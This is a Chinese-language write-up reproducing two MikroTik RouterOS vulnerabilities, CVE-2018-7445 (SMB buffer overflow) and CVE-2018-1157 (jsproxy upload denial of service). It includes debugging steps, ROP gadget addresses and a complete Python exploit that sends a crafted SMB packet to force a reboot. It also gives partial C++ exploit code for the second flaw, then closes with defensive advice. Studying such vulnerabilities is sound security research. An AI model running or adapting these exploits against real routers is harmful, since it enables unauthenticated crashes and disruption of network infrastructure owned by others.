MikroTik RouterOS漏洞复现与分析<\/h1>

环境配置<\/h2>

从MikroTik官网下载对应版本的RouterOS镜像文件<\/li>
新建虚拟机并完成安装配置<\/li>
配置MikroTik终端IP地址<\/li>

使用mikrotik-tools工具运行脚本开启telnet服务<\/li> <\/ol>

CVE-2018-7445漏洞分析<\/h2>

漏洞描述<\/h3>

漏洞类型：缓冲区溢出<\/li>
影响组件：SMB服务<\/li>
漏洞位置：处理NetBIOS会话请求消息时<\/li>
影响范围：运行6.41.3\/6.42rc27之前RouterOS的所有架构和设备<\/li>

利用条件：无需身份验证，服务开启即可利用<\/li> <\/ul>

漏洞复现步骤<\/h3>

启动SMB服务<\/strong><\/p>

在MikroTik虚拟机中确认SMB服务状态<\/li>
在Ubuntu中查看进程确认服务已启动<\/li>
通过Web服务验证访问<\/li> <\/ul> <\/li>

提取分析二进制文件<\/strong><\/p>

提取有漏洞的smb二进制文件<\/li>
使用IDA分析：ELF 32-bit格式，几乎没有保护机制<\/li>
定位漏洞代码位置：0x08054607<\/li> <\/ul> <\/li>

调试环境搭建<\/strong><\/p>

上传gdbserver.i686到虚拟机<\/li>
附加调试程序：
.\/gdbserver.i686 localhost:1234 --attach 302 <\/code><\/pre> <\/li> 本地gdb连接： gdb set architecture i386 target remote 192.168.72.140:1234 <\/code><\/pre> <\/li> <\/ul> <\/li> 漏洞触发分析<\/strong><\/p> 在sub_806B11C函数下断点<\/li> 使用smbclient发包： smbclient -L \/\/192.168.72.140 <\/code><\/pre> <\/li> 使用Wireshark抓包分析<\/li> 修改数据包绕过检查条件<\/li> <\/ul> <\/li> 构造利用载荷<\/strong><\/p> 确定溢出长度：64字节<\/li> 构造ROP链：使用vdso中的gadget：0xffffe422 (int 0x80)<\/li> 寄存器传参gadget： 0x0804f7da (pop eax ; pop ebx ; pop ebp ; ret)<\/li> 0x08054017 (pop edx ; pop ecx ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret)<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ul> <\/li> 最终利用<\/strong><\/p> 执行系统调用SYS_execve<\/li> 成功使系统重启<\/li> <\/ul> <\/li> <\/ol> 完整EXP代码<\/h3> import<\/span> socket <\/span><\/span>from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span># SMB二进制数据包<\/span> <\/span><\/span>smb_packet =<\/span> bytes.<\/span>fromhex(""" <\/span><\/span><\/span>81 00 00 ec fe 53 4d 42 40 00 00 00 00 00 00 00 <\/span><\/span><\/span>00 00 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 <\/span><\/span><\/span>00 00 00 00 00 00 00 ff ff <\/span><\/span><\/span>"""<\/span>) <\/span><\/span>smb_packet +=<\/span> b<\/span>"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaa"<\/span> <\/span><\/span> <\/span><\/span># 构造ROP链<\/span> <\/span><\/span>int_0x80_popebp_popedx_popecx_ret =<\/span> 0xffffe422<\/span> <\/span><\/span>popedx_popecx_popebx_popesi_popedi_popebp_ret =<\/span> 0x08054017<\/span> <\/span><\/span>popeax_popebx_popebp_ret =<\/span> 0x0804f7da<\/span> <\/span><\/span>str_sh_addr =<\/span> 0xffffe436<\/span> <\/span><\/span> <\/span><\/span>payload =<\/span> p32(popedx_popecx_popebx_popesi_popedi_popebp_ret) <\/span><\/span>payload +=<\/span> p32(0x1234567<\/span>) +<\/span> p32(672274793<\/span>) +<\/span> p32(0xfee1dead<\/span>) +<\/span> p32(0<\/span>) +<\/span> p32(0<\/span>) +<\/span> p32(0<\/span>) <\/span><\/span>payload +=<\/span> p32(popeax_popebx_popebp_ret) <\/span><\/span>payload +=<\/span> p32(0x58<\/span>) +<\/span> p32(0xfee1dead<\/span>) +<\/span> p32(0<\/span>) <\/span><\/span>payload +=<\/span> p32(int_0x80_popebp_popedx_popecx_ret) <\/span><\/span>payload +=<\/span> b<\/span>"a"<\/span>*<\/span>0x100<\/span> <\/span><\/span> <\/span><\/span>smb_packet +=<\/span> payload <\/span><\/span> <\/span><\/span># 配置目标<\/span> <\/span><\/span>target_ip =<\/span> "192.168.72.140"<\/span> <\/span><\/span>target_port =<\/span> 445<\/span> <\/span><\/span> <\/span><\/span># 发送攻击包<\/span> <\/span><\/span>with<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM) as<\/span> s: <\/span><\/span> s.<\/span>settimeout(5<\/span>) <\/span><\/span> print(f<\/span>"[+] Connecting to <\/span>{<\/span>target_ip}<\/span>:<\/span>{<\/span>target_port}<\/span>..."<\/span>) <\/span><\/span> s.<\/span>connect((target_ip, target_port)) <\/span><\/span> print("[+] Sending SMB packet..."<\/span>) <\/span><\/span> s.<\/span>sendall(smb_packet) <\/span><\/span> try<\/span>: <\/span><\/span> response =<\/span> s.<\/span>recv(4096<\/span>) <\/span><\/span> print(f<\/span>"[+] Received <\/span>{<\/span>len(response)}<\/span> bytes in response:"<\/span>) <\/span><\/span> print(response.<\/span>hex()) <\/span><\/span> except<\/span> socket.<\/span>timeout: <\/span><\/span> print("[-] No response received (timeout)"<\/span>) <\/span><\/span><\/code><\/pre>CVE-2018-1157漏洞分析<\/h2> 漏洞描述<\/h3> 影响组件：www服务(80端口)<\/li> 利用路径：\/jsproxy\/upload<\/li> 利用方式：发送特制的POST请求导致资源耗尽<\/li> <\/ul> 漏洞复现步骤<\/h3> 服务分析<\/strong><\/p> 确认www服务运行状态<\/li> 使用bp抓包分析POST请求<\/li> 请求路径为\/jsproxy，数据被加密<\/li> <\/ul> <\/li> 定位漏洞组件<\/strong><\/p> 找到jsproxy处理程序<\/li> 确认其为共享库(.so文件)<\/li> 在www程序中找到加载的jsproxy.p文件<\/li> <\/ul> <\/li> 漏洞定位<\/strong><\/p> 漏洞位置：sub_774BBE9F函数<\/li> 漏洞成因：循环解析数据时未正确处理长度限制<\/li> <\/ul> <\/li> 构造利用<\/strong><\/p> 使用RouterOS官方提供的C++ winboxapi库<\/li> 构造超长文件名(超过0x100个字符)<\/li> 多次发送请求耗尽系统资源<\/li> <\/ul> <\/li> <\/ol> 部分EXP代码<\/h3> if<\/span> (!<\/span>jsSession.negotiateEncryption(username, password)) { <\/span><\/span> std::<\/span>cerr <<<\/span> "Encryption negotiation failed."<\/span> <<<\/span> std::<\/span>endl; <\/span><\/span> return<\/span> EXIT_FAILURE; <\/span><\/span>} <\/span><\/span> <\/span><\/span>std::<\/span>string filename; <\/span><\/span>for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> 0x200<\/span>; i++<\/span>) { <\/span><\/span> filename.push_back('A'<\/span>); \/\/ 填充超过0x100个字符 <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>if<\/span> (jsSession.uploadFile(filename, "lol."<\/span>)) { <\/span><\/span> std::<\/span>cout <<<\/span> "success!"<\/span> <<<\/span> std::<\/span>endl; <\/span><\/span>} <\/span><\/span><\/code><\/pre>防御建议<\/h2> 及时更新RouterOS到最新版本<\/li> 关闭不必要的服务(SMB、jsproxy等)<\/li> 限制对管理接口的访问<\/li> 配置适当的资源限制防止DoS攻击<\/li> 监控系统日志异常行为<\/li> <\/ol> 总结<\/h2> 本文详细分析了MikroTik RouterOS中的两个严重漏洞(CVE-2018-7445和CVE-2018-1157)，包括漏洞原理、复现步骤和利用方法。通过这两个漏洞的复现过程，可以深入理解RouterOS的安全机制和漏洞利用技术。<\/p>